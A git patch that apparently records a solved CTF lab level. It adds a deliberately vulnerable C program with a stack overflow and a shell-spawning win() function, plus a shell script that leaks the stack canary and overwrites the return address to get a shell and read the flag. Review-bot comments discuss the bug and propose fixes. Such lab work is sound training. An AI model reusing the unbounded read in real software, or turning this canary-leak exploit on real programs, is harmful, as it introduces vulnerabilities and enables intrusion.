From 4c3e281ef5ee82c60172d97c37ab454057490a7d Mon Sep 17 00:00:00 2001
From: Eggert Jung
Date: Tue, 6 Jan 2026 15:54:17 +0100
Subject: [PATCH] solved 6
---
 4/level6/flag.txt | 1 +
 4/level6/level6 | Bin 0 -> 17008 bytes
 4/level6/level6.c | 27 +++++++++++++++++++++++++++
 4/level6/test.sh | 34 ++++++++++++++++++++++++++++++++++
 4 files changed, 62 insertions(+)
 create mode 100644 4/level6/flag.txt
 create mode 100755 4/level6/level6
 create mode 100644 4/level6/level6.c
 create mode 100755 4/level6/test.sh
diff --git a/4/level6/flag.txt b/4/level6/flag.txt
new file mode 100644
index 0000000..edd5b55
--- /dev/null
+++ b/4/level6/flag.txt
@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}
diff --git a/4/level6/level6 b/4/level6/level6 new file mode 100755 index 0000000000000000000000000000000000000000..35db28d83bdfe00abfc17ba59ab260ed537ac80d GIT binary patch literal 17008 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 E4>EQ%0{{R3 literal 0 HcmV?d00001 diff --git a/4/level6/level6.c b/4/level6/level6.c new file mode 100644 index 0000000..db1d711 --- /dev/null +++ b/4/level6/level6.c @@ -0,0 +1,27 @@ +// gcc -o level6 -no-pie -fstack-protector level6.c +#include +#include + +void win(void) { + char *argv[2]; + argv[0] = "/bin/sh"; + argv[1] = NULL; + execve(argv[0], argv, NULL); +} + +int main(int argc, char **argv) { + // Disable output buffering. Not part of the challenge. + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + + char buffer[64]; + while (1) { + puts("What do you want to talk about?"); + read(0, buffer, 128); + if (buffer[0] == '\0' || buffer[0] == '\n') break; + + printf("I can't talk about %s.\n", buffer); + } + puts("Bye."); + return 0; +} diff --git a/4/level6/test.sh b/4/level6/test.sh new file mode 100755 index 0000000..0bb6db3 --- /dev/null +++ b/4/level6/test.sh 
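Review bot: In `main` of 4/level6/level6.c, `read(0, buffer, 128)` can write up to 128 bytes into the 64-byte `buffer`, and because the input is never NUL-terminated the following `printf("%s")` can print stack bytes that lie beyond what was typed. The return value of `read` is also ignored, so on EOF or an error the loop re-tests stale buffer contents and may never reach `break`. A bounded version of those lines would be `ssize_t n = read(0, buffer, sizeof buffer - 1);`, `if (n <= 0) break;` and `buffer[n] = '\0';`. If the oversized read is deliberate for the exercise, a comment directly above it such as `/* intentionally unbounded: training target, do not reuse */` would keep the pattern from being copied into other code.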
@@ -0,0 +1,34 @@
+#objdump
+#00000000004011d6 g F .text 000000000000003a win
+
+OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00" #kind of irrelevant
+GADGET1="\x84\x12\x40\00\00\00\00\00" #ret (for stack alignment)
+GADGET2="\x83\x12\x40\00\00\00\00\00" #pop rdi, ret
+CMDADDR="\x48\x40\x40\00\00\00\00\00"
+CMDCALL="\xd6\x11\x40\00\00\00\00\00"
+#STACKPT="\x18\xde\xff\xff\xff\x7f\00\00"
+STACKPT="\x02\00\00\00\00\00\00\00"
+
+read
+read
+printf "$OLDFLAG"
+read
+read
+
+printf "$PADDING""AAAAAAAA\n"
+read
+read
+read canary
+>&2 echo "read canary: "$(echo "$canary" | hd)
+read input
+>&2 echo $input
+
+>&2 echo "writing canary + exploit"
+printf "\00$PADDING""1234567\00${canary:0:7}$STACKPT$CMDCALL\n"
+read input
+>&2 echo "should be bye: "$input
+printf "cat flag.txt\n"
+read input
+>&2 echo "should be shell: "$input
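Review bot: `OLDFLAG` at the top of test.sh commits what appears to be an already-solved flag in plaintext; flags act as credentials for the exercise and are better read from an untracked file or an environment variable than stored in the repository history. The file is created with mode 100755 but has no interpreter line although it relies on the bash-only `${canary:0:7}` expansion, so `#!/bin/bash` should be its first line. `SAVERBP`, `GADGET1`, `GADGET2` and `CMDADDR` are assigned and never referenced anywhere in the hunk and can be dropped as leftovers.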